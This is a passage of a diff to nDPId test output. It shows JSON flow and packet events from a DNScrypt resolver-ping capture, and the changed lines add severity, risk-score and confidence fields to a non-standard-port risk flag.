AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTcAuX4RBDsKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":550,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTgAuX4RBDoKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -1138,26 +1138,26 @@
 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoaxAADYRp\/65wX\/0CgAAAQG7u2MAvNXc\/IqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQhAAH4RLuEKAAABTUJU6cGgAbsCCGUBsp4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQlAAH4RLuAKAAABTUJU6bQ8AbsCCGUBspoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQogAH4RSx8KAAABTUJU6Z0RAbsGBIoKspkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQtAAH4RLt4KAAABTUJU6cJEAbsCCGUBspwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQoAuX4Rb\/IKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQwgAH4RSx0KAAABTUJU6cZFAbsGBGDUspsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA